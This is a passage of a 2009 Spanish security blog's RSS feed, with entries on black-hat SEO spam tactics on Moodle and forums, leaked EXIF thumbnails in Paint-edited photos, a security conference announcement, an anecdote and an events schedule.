/&gt;&lt;strong&gt;&lt;em&gt;Explotación de la infraestructura&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;La profesionalidad de estos autollamados posicionadores SEO hace que se creen sitios e incluso dominios para alojar y gestionar las infraestructuras que necesitan para su trabajo. Así, en el caso anterior, la URL de la imagen mostrada era: &lt;a href="http://fredbam.com/i/screen3.gif"&gt;http://fredbam.com/i/screen3.gif&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Con sólo modificar el número 3 por otros valores se puede comprobar que disponen de hasta 20 imágenes distintas con las que personalizar sus perfiles:&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SvE5vxulXiI/AAAAAAAAFcE/UqfILegEFWg/s1600-h/Figura14.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 332px;" src="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SvE5vxulXiI/AAAAAAAAFcE/UqfILegEFWg/s400/Figura14.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5400160921159294498" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 14: Máscaras para disfrazar perfiles Moodle&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Estos escaparates permiten ofrecer servicios tanto de posicionamiento en buscadores como de redirección de tráfico a otros sitios web con objeto de incrementar sus visitas.&lt;br /&gt;&lt;br /&gt;Si controlas páginas B con relevancia, puedes promocionar muchas páginas A cobrando pasta por ello. En estos negocios, la flexibilidad es siempre un valor añadido: Hoy Viagra, mañana otro producto, pasado mañana, por qué no, partidos políticos, que se están subiendo al carro del SEO muy rápidamente.&lt;br /&gt;&lt;br /&gt;Este ejemplo visto con plataforma Moodle se repite sistemáticamente con cualquier otra plataforma que permita crear cuentas de usuario sin un control estricto.&lt;br /&gt;&lt;br /&gt;**********************************************************************************************&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/seo-para-gente-de-moral-relajada-i-de.html"&gt;Técnicas SEO para gente de moral relajada [I de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [II de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [III de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral_09.html"&gt;Técnicas SEO para gente de moral relajada [IV de VI]&lt;/a&gt;&lt;br /&gt;- Técnicas SEO para gente de moral relajada [V de VI]&lt;br /&gt;- Técnicas SEO para gente de moral relajada [VI de VI]&lt;br /&gt;&lt;em&gt;Autores: Chema Alonso &amp; Enrique Rando&lt;/em&gt;&lt;br /&gt;**********************************************************************************************&lt;/div&gt;&lt;strong&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-6092233037653373609?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/_gUJGr609OA" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/_gUJGr609OA/tecnicas-seo-para-gente-de-moral.html</link><author>noreply@blogger.com (Maligno)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvE5w5QKy6I/AAAAAAAAFck/cuHG_5Rqkdc/s72-c/Figura10.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">4</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-5509865141353172659</guid><pubDate>Tue, 03 Nov 2009 06:33:00 +0000</pubDate><atom:updated>2009-11-03T07:57:37.126+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Eventos</category><category domain="http://www.blogger.com/atom/ns#">Seguridad Informática</category><title>Día Internacional de la Seguridad Informática 2009</title><description>&lt;div align="justify"&gt;En 1998 ACM, la Association for Computing Machinery, declaró el 30 de Noviembre como el Día de la Seguridad Informática. Esto es algo que Jorge Ramió se encarga de recordarnos todos los años cuando da comienzo el Día Internacional de la Seguridad Informática en la Escuela Universitaria de Informática de la Universidad Politécnica de Madrid.&lt;br /&gt;&lt;br /&gt;Jorge y &lt;strong&gt;&lt;em&gt;Justo Carracedo&lt;/em&gt;&lt;/strong&gt; llevan ya varios años pegándose con este DISI en el que yo he tenido el honor ya de participar. Lo cierto es que el primer año mi aparición fue desde el banquillo. Sí, allá por el 30 de Noviembre de 2006 me pidió Jorge que diera una sesión, exáctamente la última del día, justo antes del cierre de la conferencia, para sustituir a un ponente que no pudo venir. En esa ocasión me pillaba enfrascado en pleno Proyecto de Fin de Carrera de la Ingeniería Informática y di una charla sobre Blind SQL Injection en la que hablé de las consutas pesadas por primera vez.&lt;br /&gt;&lt;br /&gt;Al margen de mi peculiar participación en el DISI, por este evento han pasado ilustres nombres nacionales e internacionales. El DISI siempre quiere traer a un científico importante a estas conferencias. Así, han pasado ya del Dr. Martin Hellman, el Dr. Hugo Scolnik o la Dra. Radia Perlman para dar charlas de lo más interesantes. He de reconocer que la charla de Radia me encantó el año pasado.&lt;br /&gt;&lt;br /&gt;Este año, como no podía ser menos, tendremos al &lt;strong&gt;&lt;em&gt;Dr. Hugo Krawczyk&lt;/em&gt;&lt;/strong&gt;, de IBM Research, experto en criptografía que, además, habla perfectamente castellano y dará su conferencia en español. Como acompañantes, estará una lista de amigos de por aquí, como son &lt;strong&gt;&lt;em&gt;Ero Carrera &lt;/em&gt;&lt;/strong&gt;de Virus Total, &lt;strong&gt;&lt;em&gt;Emilio Castelote&lt;/em&gt;&lt;/strong&gt; de Panda Security, &lt;strong&gt;&lt;em&gt;Alejandro Ramos "dab"&lt;/em&gt;&lt;/strong&gt; de SecurityByDefault, &lt;strong&gt;&lt;em&gt;Fermin J. Serna&lt;/em&gt;&lt;/strong&gt; de Spectra. Además nos acompañarán &lt;strong&gt;&lt;em&gt;José Bidot&lt;/em&gt;&lt;/strong&gt; de Segurmática Cuba y &lt;strong&gt;&lt;em&gt;Luís Guillermo Castañeda&lt;/em&gt;&lt;/strong&gt;, que viene desde México.&lt;br /&gt;&lt;br /&gt;Para completar la jornada, y teniendo en cuenta que estamos en crisis, todo esto vendrá acompañado de un desayuno cóctel de 45 minutos para charlar con la gente y hacer amigos y sin costar un duro. Es decir, sólo tienes que apuntarte, venir a las charlas, desayunar gratis, conocer gente y encima recibir un certificado acreditativo de 5 creditos CPE de formación continua en seguridad infórmática. ¿No está mal, verdad?&lt;br /&gt;&lt;br /&gt;Tienes toda la información en la &lt;a href="http://www.capsdesi.upm.es/"&gt;URL del DISI 2009&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Saludos Malignos!&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-5509865141353172659?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/xDMLQJFSzuY" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/xDMLQJFSzuY/dia-internacional-de-la-seguridad.html</link><author>noreply@blogger.com (Maligno)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">6</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/11/dia-internacional-de-la-seguridad.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-1658600317662363539</guid><pubDate>Mon, 02 Nov 2009 21:01:00 +0000</pubDate><atom:updated>2009-11-03T07:58:09.619+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Curiosidades</category><category domain="http://www.blogger.com/atom/ns#">Eventos</category><category domain="http://www.blogger.com/atom/ns#">Humor</category><title>Cagadas IV: El digrama entidad relación</title><description>&lt;div align="justify"&gt;El proceso de normalización de las bases de datos mediante las formas normales de nuestros amigos &lt;a href="http://es.wikipedia.org/wiki/Forma_normal_de_Boyce-Codd"&gt;Boyce-Codd&lt;/a&gt; lleva a la generación de un modelo de almacenamiento de datos en las que las entidades están relacionadas entre sí con claves foráneas incrustadas en la misma tabla de almacenamiento de la entidad o, si la relación es &lt;em&gt;n-m&lt;/em&gt;, al establecimiento de una tabla intermedia que almacena las claves foráneas de las entidades relacionadas en tal grado de relación &lt;em&gt;n a m&lt;/em&gt;.&lt;br /&gt;&lt;br /&gt;Dicho esto he de decir que mi cerebro funciona bien en almacenamiento, pero mal en relación. Es decir, soy capaz de recordar caras que he visto una única vez en un evento, pero me cuesta mucho recordar dónde cojones fue el lugar si la entidad cara es situada en otro lugar. Así, desde hace tiempo me esfuerzo, mientras estoy hablando con alguien, de recordar exactamente cuándo fue la última vez que nos vimos y dónde.&lt;br /&gt;&lt;br /&gt;Conocido ya esto por vosotros, dejadme que os narre mi paso por una conferencia de la Universidad Politécnica en la que iba a dar una charlita. Allí, por cortesía del comité organizador, había una comida con los ponentes que participaban en la sesión. Cuando llegué, con la hora pegada al culo como de costumbre, se encontraban todos reunidos así que pasé a saludar a todos los personajes que allí daban rienda suelta al gañote antes de la sesión de la tarde.&lt;br /&gt;&lt;br /&gt;Entre los contertulios se encontraba nuestro querido &lt;a href="http://elladodelmal.blogspot.com/2008/05/entrevista-jorge-rami.html"&gt;Little buda&lt;/a&gt; y creo que &lt;em&gt;Mercè Molist&lt;/em&gt;, junto a una persona de la que me sonaba su cara y que se llamaba &lt;strong&gt;&lt;em&gt;Miguel Ángel&lt;/em&gt;&lt;/strong&gt;:&lt;br /&gt;&lt;br /&gt;- &lt;em&gt;“Hola, ¿nos conocemos de algo?”&lt;/em&gt;, dije yo entre confundido y descolocado.&lt;br /&gt;- &lt;em&gt;“Pues… no sé, no creo”&lt;/em&gt;, respondió él.&lt;br /&gt;- &lt;em&gt;“Vaya, pues yo creo que sí, porque tu cara me suena, de alguna otra charla, seguro”&lt;/em&gt;.&lt;br /&gt;&lt;br /&gt;Él se quedó pensativo y le estuvo dando vueltas a la cabeza, pero no encontraba ningún indicio que le hiciera recordar que nos conocíamos. Eso a mí me extrañaba, sobre todo teniendo en cuenta que estaba de por medio Little Buda, que es famoso por no parar un minuto de organizar historias y a mí me había involucrado ya en varias.&lt;br /&gt;&lt;br /&gt;- &lt;em&gt;“¿Estás seguro?”&lt;/em&gt;, insití yo ya totalmente descolocado. &lt;em&gt;“Pues es raro, tu cara me suena, juraría que nos conocemos”&lt;/em&gt;, terminé de decir.&lt;br /&gt;&lt;br /&gt;Tras un minuto de pensar él contesto:&lt;br /&gt;&lt;br /&gt;- &lt;em&gt;“Pues como no sea que me conozcas de cuando yo era actor. Hice una serie que fue muy famosa que se llamaba Verano Azul en la que yo era conocido como el Piraña y tal vez sea de ahí”&lt;/em&gt;, me dijo.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Fail.&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://es.wikipedia.org/wiki/Miguel_%C3%81ngel_Valero"&gt;Miguel Ángel Valero&lt;/a&gt;, de Piraña a Doctor en la Universidad Politécnica de Madrid.&lt;br /&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-1658600317662363539?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/jdHSfkBvTRA" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/jdHSfkBvTRA/cagadas-iv-el-digrama-entidad-relacion.html</link><author>noreply@blogger.com (Maligno)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">8</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/11/cagadas-iv-el-digrama-entidad-relacion.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-5638404505546908817</guid><pubDate>Sun, 01 Nov 2009 23:30:00 +0000</pubDate><atom:updated>2009-11-02T00:41:24.069+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Windows Vista</category><category domain="http://www.blogger.com/atom/ns#">Curiosidades</category><category domain="http://www.blogger.com/atom/ns#">Windows 7</category><category domain="http://www.blogger.com/atom/ns#">Metadatos</category><title>Porno amateur con Windows7</title><description>&lt;div align="justify"&gt;La información &lt;a href="http://es.wikipedia.org/wiki/Exchangeable_image_file_format"&gt;EXIF&lt;/a&gt; asociada a fotografías ha dado y da muchas tardes de diversión para los amigos de los metadatos. Es por eso que se decidió dar especial importancia a EXIF en la &lt;a href="http://www.informatica64.com/foca"&gt;FOCA&lt;/a&gt;. Ahora mismo la versión de la FOCA extrae la información EXIF asociada a archivos gráficos y la información EXIF asociada a archivos gráficos incrustados en documentos ofimáticos.&lt;br /&gt;&lt;br /&gt;Muchas son las cagadas que se pueden sacar de la información EXIF como pedir que te envíen una foto reciente y la fecha de la misma sea de hace 3 años, publicar una foto de porno amateur generada con tu &lt;em&gt;ay!fon&lt;/em&gt; en la que ocultas tus ojos pero dejas guardada la información GPS de tu casa y, por supuesto, la famosa cagada del thumbnail.&lt;br /&gt;&lt;br /&gt;La cagada del thumbnail o miniatura se produce cuando envías tu foto a un grupo de porno amateur. Esa fotografía la has recortado desde una fotografía original que, en la información EXIF, llevaba asociada la miniatura. Si el programa que has utilizado no modifica el thumbnail cuando recortas la foto, entonces estás jodido y las risas pueden ser grandes.&lt;br /&gt;&lt;br /&gt;Normalmente esto sucedía con los usuarios que utilizan para esta ardua labor de retoque fotográfico la suite de diseño gráfico llamada “Paint Brush”. En sus versiones de Windows XP y Windows Vista no modifica el thumbnail. Veamos un ejemplo.&lt;br /&gt;&lt;br /&gt;En esta fotografía estoy yo con David Cervigón jugando un día al PaintBall. En ella se puede ver que yo estoy feliz, antes de darme cuenta de que con David no hay que jugar con cosas que puedan generar moratones y hacer daño.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/Su1WW07m_5I/AAAAAAAAFb8/Z6CnlXwT36A/s1600-h/FotoOriginal.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 350px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/Su1WW07m_5I/AAAAAAAAFb8/Z6CnlXwT36A/s400/FotoOriginal.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5399066478452866962" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 1: Foto Original&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Supongamos que decido, una vez que me ha dado para el pelo, quitarle de mi fotografía y utilizo para ello el Paint Brush de Windows Vista.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_Y2uWeGSk9Sw/Su1WWHgGroI/AAAAAAAAFb0/0JSD1AHYDsc/s1600-h/paintVISTA.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 377px; height: 400px;" src="http://2.bp.blogspot.com/_Y2uWeGSk9Sw/Su1WWHgGroI/AAAAAAAAFb0/0JSD1AHYDsc/s400/paintVISTA.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5399066466257907330" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 2: Foto modificada con el Paint de Windows Vista&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Para poder comparar resultados realizo la misma acción con el Paint Brush de Windows 7.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/Su1WV23J9wI/AAAAAAAAFbs/JcaAxZwaRUk/s1600-h/paint7.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 288px;" src="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/Su1WV23J9wI/AAAAAAAAFbs/JcaAxZwaRUk/s400/paint7.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5399066461791188738" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 3: Foto modificada cone l Paint de Windows 7&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Aparentemente, cuando se visualizan las fotos, ambas son iguales pues externamente han sido cortadas las dos. Sin embargo, si miramos la información EXIF asociada a estas dos fotos con la &lt;a href="http://www.informatica64.com/foca"&gt;FOCA RC2&lt;/a&gt;, podemos ver que la que se ha editado con Windows Vista aun conserva el thumbnail original. Esto es así porque el Paint de Windows Vista no modifica la info EXIF.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/Su1WVhRX1YI/AAAAAAAAFbk/C2aa_RaKw0o/s1600-h/FOCA_Vista.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 197px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/Su1WVhRX1YI/AAAAAAAAFbk/C2aa_RaKw0o/s400/FOCA_Vista.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5399066455995569538" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 4: Información EXIF asociada a foto modificada con Paint de Vista&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Sin embargo, la información EXIF de la fotografía modificada con el Paint Brush de Windows 7 si ha sido modificada, y en el thumbnail se almacena la información de la miniatura después de ser modificada. &lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/Su1WVYK2h2I/AAAAAAAAFbc/40C5nv-auwo/s1600-h/FOCA_7.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 197px;" src="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/Su1WVYK2h2I/AAAAAAAAFbc/40C5nv-auwo/s400/FOCA_7.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5399066453552301922" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 5: Información EXIF asociada a foto modificada con Paint de Windows7&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Como conclusión, si queréis seguir con vuestras aventuras de fucker enmascarado, es mejor que utilicéis Windows7 o que probéis como se comporta vuestra herramienta de de &lt;em&gt;"retoque fotográfico"&lt;/em&gt; favorita con la información EXIF.&lt;br /&gt;&lt;br /&gt;Saludos!&lt;br /&gt;&lt;br /&gt;PD: ¿Qué otras herramientas conoces que se comporten como el Paint de Windows XP y Windows Vista con los thumbnails?&lt;/div&gt;&lt;strong&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-5638404505546908817?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/K4F-HhZMIkg" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/K4F-HhZMIkg/porno-amateur-con-windows7.html</link><author>noreply@blogger.com (Maligno)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/Su1WW07m_5I/AAAAAAAAFb8/Z6CnlXwT36A/s72-c/FotoOriginal.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">24</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/11/porno-amateur-con-windows7.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-8185269627259214568</guid><pubDate>Sat, 31 Oct 2009 23:01:00 +0000</pubDate><atom:updated>2009-10-31T22:11:20.227+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Eventos</category><title>Y la próxima semana...</title><description>&lt;div align="justify"&gt;Los seminarios de la &lt;a href="http://www.informatica64.com/dlink"&gt;Azlan D-Link Academy&lt;/a&gt; tendrán lugar en &lt;u&gt;Barcelona&lt;/u&gt;, con 4 acciones formativas que darán acceso a los certificados oficiales D-Link de Security, Networking y WiFi. En &lt;u&gt;Madrid&lt;/u&gt; continuará la campaña de &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;Hands On Lab&lt;/a&gt; con seminarios dedicados a &lt;u&gt;System Center&lt;/u&gt; y &lt;u&gt;Windows Server 2008 R2&lt;/u&gt;. El &lt;a href="http://elladodelmal.blogspot.com/2009/08/innovation-tour-2009.html"&gt;Innovation Tour&lt;/a&gt;, gira de presentación de Windows 7 y Windows Server 2008 R2 nacional, llegará a Santiago de Compostela y a Logroño, mientras que el Developer &amp; Design Tour estará el día 4 en Santiago de Compostela. A parte de todo esto, el día 5, yo pasaré a dar una charla por la Universidad de Burgos a las 19:00 horas. Esta es la agenda detallada:&lt;br /&gt;&lt;br /&gt;02 [Barcelona] &lt;a href="http://www.informatica64.com/dlink"&gt;DL01 – Network Design&lt;/a&gt;&lt;br /&gt;02 [Madrid] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-MOM10 MS System Center Operations Manager 2007&lt;/a&gt;&lt;br /&gt;03 [Santiago] &lt;a href="http://elladodelmal.blogspot.com/2009/08/innovation-tour-2009.html"&gt;Innovation Tour&lt;/a&gt;&lt;br /&gt;03 [Barcelona] &lt;a href="http://www.informatica64.com/dlink"&gt;DL04 – Tecnología WiFi&lt;/a&gt;&lt;br /&gt;03 [Madrid] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-WIN51 Implementación MS Windows Server 2008R2&lt;/a&gt; &lt;br /&gt;03 [Madrid] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-WIN70 Implementando Redes WiFi Seguras&lt;/a&gt;&lt;br /&gt;04 [Santiago] &lt;a href="http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032425985&amp;Culture=es-ES"&gt;Developer &amp; Design Tour&lt;/a&gt;&lt;br /&gt;04 [Barcelona] &lt;a href="http://www.informatica64.com/dlink"&gt;DL03 – Tecnología Firewalling&lt;/a&gt;&lt;br /&gt;04 [Madrid] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-MOM11 MS SC Operations Manager 2007 con Exchange Server&lt;/a&gt;&lt;br /&gt;05 [Logroño] &lt;a href="http://elladodelmal.blogspot.com/2009/08/innovation-tour-2009.html"&gt;Innovation Tour&lt;/a&gt;&lt;br /&gt;05 [Barcelona] &lt;a href="http://www.informatica64.com/dlink"&gt;DL02 – Tecnología Switching&lt;/a&gt;&lt;br /&gt;05 [Madrid] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-WIN52 MS Windows Server 2008R2 Server Core&lt;/a&gt;&lt;br /&gt;05 [Burgos] &lt;strong&gt;&lt;em&gt;Metadata Security&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;06 [Madrid] &lt;a href="http://www.microsoft.com/spain/seminarios/hol.mspx"&gt;HOL-SMS10 System Center Configuration Manager 2007&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Y aquí, en el blog, yo seguiré con mis chorradas.&lt;br /&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-8185269627259214568?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/ihQPzm-tm-E" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/ihQPzm-tm-E/y-la-proxima-semana.html</link><author>noreply@blogger.com (Maligno)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/10/y-la-proxima-semana.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-7908311722104141990</guid><pubDate>Fri, 30 Oct 2009 23:01:00 +0000</pubDate><atom:updated>2009-11-09T22:14:23.079+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Spam</category><category domain="http://www.blogger.com/atom/ns#">SEO</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Google</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>Técnicas SEO para gente de moral relajada [II de VI]</title><description>&lt;div align="justify"&gt;**********************************************************************************************&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/seo-para-gente-de-moral-relajada-i-de.html"&gt;Técnicas SEO para gente de moral relajada [I de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [II de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [III de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral_09.html"&gt;Técnicas SEO para gente de moral relajada [IV de VI]&lt;/a&gt;&lt;br /&gt;- Técnicas SEO para gente de moral relajada [V de VI]&lt;br /&gt;- Técnicas SEO para gente de moral relajada [VI de VI]&lt;br /&gt;&lt;em&gt;Autores: Chema Alonso &amp; Enrique Rando&lt;/em&gt;&lt;br /&gt;**********************************************************************************************&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Spam de temas de debate&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Como el objetivo es conseguir el mayor número de links entrantes a la web que se busca posicionar bien en un buscador, el poner links en cualquier lugar es obligatorio. Para ello se busca postear en cualquier sistema que lo permita y poner links allí. Objetivo típico de esta técnica son los foros de debate y blogs entre otros.&lt;br /&gt;&lt;br /&gt;Para ello, el atacante primeramente se ha de crear una lista de URLs de foros y blogs descubiertos que permitan postear comentarios y que además sean &lt;em&gt;"consentidores"&lt;/em&gt;, es decir, que no borren el spam o que al menos no lo borren rápido. Estas listas de URLs masivas se cargan en programas que automatizan la creación de entradas, en el caso de que se pueda realizar, o simplemente postear comentarios. En la siguiente imagen se puede ver como se ha creado un nuevo tema de debate en el foro de GIMP-ES.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SutkKZaE7oI/AAAAAAAAFbU/RCLv4Ogh56Y/s1600-h/Figura4.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 283px;" src="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SutkKZaE7oI/AAAAAAAAFbU/RCLv4Ogh56Y/s400/Figura4.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5398518708115402370" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 4: Tema de debate sobre la Viagra en Gimp-es&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Esto no tendría tanta importancia si el resultado fuera de un único tema, pero como se puede ver realizando una simple búsqueda en Google, el número de temas recomendando Viagra que se ha creado en este foro es de más de 2.700. &lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/Sutjd9fI34I/AAAAAAAAFbM/GDb9rolQ1gM/s1600-h/Figura5.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 73px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/Sutjd9fI34I/AAAAAAAAFbM/GDb9rolQ1gM/s400/Figura5.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5398517944706195330" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 5: &lt;a href="http://www.google.es/search?hl=es&amp;q=site%3Agimp.org.es+viagra&amp;meta=&amp;aq=f&amp;oq="&gt;Más de 2.700 resultados de Viagra en Gimp-es&lt;/a&gt;&lt;/em&gt;&lt;/center&gt; &lt;br /&gt;&lt;strong&gt;&lt;em&gt;Spam de comentarios&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;A veces no se consiguen crear temas de debate, pero se pueden postear libremente comentarios en algún tema de debate ya 